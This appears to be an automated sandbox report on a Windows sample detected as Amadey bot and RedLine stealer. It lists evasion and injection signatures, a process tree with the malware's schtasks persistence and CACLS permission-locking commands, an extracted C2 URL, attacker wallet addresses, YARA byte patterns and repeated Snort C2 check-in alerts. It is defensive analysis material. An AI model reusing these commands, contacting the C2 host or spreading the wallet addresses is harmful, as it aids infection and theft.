Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	800799
MD5:	16755b75334b8655bc2357553a9fdab4
SHA1:	5705cf96e5337cd165fce107d5d11c020a69fe4f
SHA256:	e2b454a6a774a94abfde2acec235fde33da717943ab9e2c5c51b8428df0f9253
Tags:	exe
Infos:

Detection

Amadey, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Yara detected Amadey bot

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected Amadeys Clipper DLL

Disable Windows Defender real time protection (registry)

Machine Learning detection for sample

Contains functionality to inject code into remote processes

Uses schtasks.exe or at.exe to add and modify task schedules

Disable Windows Defender notifications (registry)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Uses cacls to modify the permissions of files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

file.exe (PID: 1216 cmdline: C:\Users\user\Desktop\file.exe MD5: 16755B75334B8655BC2357553A9FDAB4)

bfCg.exe (PID: 2564 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe MD5: DAE3685D13248C42313D46F76E2EC968)

afCf.exe (PID: 2360 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe MD5: 6E870598039CCE621C7BB265AC99BB3F)

nika.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

xriv.exe (PID: 1744 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 1276 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

schtasks.exe (PID: 1084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2376 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4784 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 3888 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 4788 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 676 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 1328 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 3712 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

rundll32.exe (PID: 788 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5164 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5168 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

mnolyk.exe (PID: 4760 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 5100 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 3888 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 1100 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

mnolyk.exe (PID: 5124 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)

cleanup

Malware Configuration

Threatname: Amadey

{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}

Threatname: Amadey

{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.288363449.0000000000857000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1328:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.2.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.afCf.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.afCf.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
11.2.xriv.exe.1360000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.3.afCf.exe.6b0000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.3.afCf.exe.6b0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.afCf.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.afCf.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
30.0.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
30.2.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.file.exe.4a7e820.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.0.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.rundll32.exe.6d0c0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.2.afCf.exe.660e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.afCf.exe.660e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
28.0.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.0.xriv.exe.1360000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
28.2.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.0.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.3.file.exe.4a7e820.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.2.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.0.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.mnolyk.exe.980000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 20 entries

Snort Signatures

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449858802027700 02/07/23-20:01:29.126524
SID:	2027700
Source Port:	49858
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450186802027700 02/07/23-20:03:04.107236
SID:	2027700
Source Port:	50186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450318802027700 02/07/23-20:03:38.985319
SID:	2027700
Source Port:	50318
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450088802027700 02/07/23-20:02:36.767849
SID:	2027700
Source Port:	50088
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450284802027700 02/07/23-20:03:30.624651
SID:	2027700
Source Port:	50284
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449763802027700 02/07/23-20:01:01.550107
SID:	2027700
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449791802027700 02/07/23-20:01:10.547144
SID:	2027700
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450030802027700 02/07/23-20:02:18.384404
SID:	2027700
Source Port:	50030
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450382802027700 02/07/23-20:03:54.707955
SID:	2027700
Source Port:	50382
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450480802027700 02/07/23-20:04:18.662379
SID:	2027700
Source Port:	50480
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449800802027700 02/07/23-20:01:12.702989
SID:	2027700
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449956802027700 02/07/23-20:01:56.737292
SID:	2027700
Source Port:	49956
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450416802027700 02/07/23-20:04:03.085073
SID:	2027700
Source Port:	50416
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450125802027700 02/07/23-20:02:46.439463
SID:	2027700
Source Port:	50125
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450379802027700 02/07/23-20:03:53.987905
SID:	2027700
Source Port:	50379
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450477802027700 02/07/23-20:04:17.942956
SID:	2027700
Source Port:	50477
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450027802027700 02/07/23-20:02:17.657151
SID:	2027700
Source Port:	50027
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450223802027700 02/07/23-20:03:13.167790
SID:	2027700
Source Port:	50223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450321802027700 02/07/23-20:03:39.741323
SID:	2027700
Source Port:	50321
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450256802027700 02/07/23-20:03:21.219153
SID:	2027700
Source Port:	50256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449796802027700 02/07/23-20:01:11.751019
SID:	2027700
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449951802027700 02/07/23-20:01:55.550313
SID:	2027700
Source Port:	49951
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450002802027700 02/07/23-20:02:11.408990
SID:	2027700
Source Port:	50002
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450411802027700 02/07/23-20:04:01.821830
SID:	2027700
Source Port:	50411
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449928802027700 02/07/23-20:01:49.894595
SID:	2027700
Source Port:	49928
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450120802027700 02/07/23-20:02:44.901958
SID:	2027700
Source Port:	50120
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450161802027700 02/07/23-20:02:58.254042
SID:	2027700
Source Port:	50161
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450374802027700 02/07/23-20:03:52.768199
SID:	2027700
Source Port:	50374
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450469802027700 02/07/23-20:04:16.004547
SID:	2027700
Source Port:	50469
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450215802027700 02/07/23-20:03:11.200842
SID:	2027700
Source Port:	50215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450452802027700 02/07/23-20:04:11.861795
SID:	2027700
Source Port:	50452
Destination Port:	80
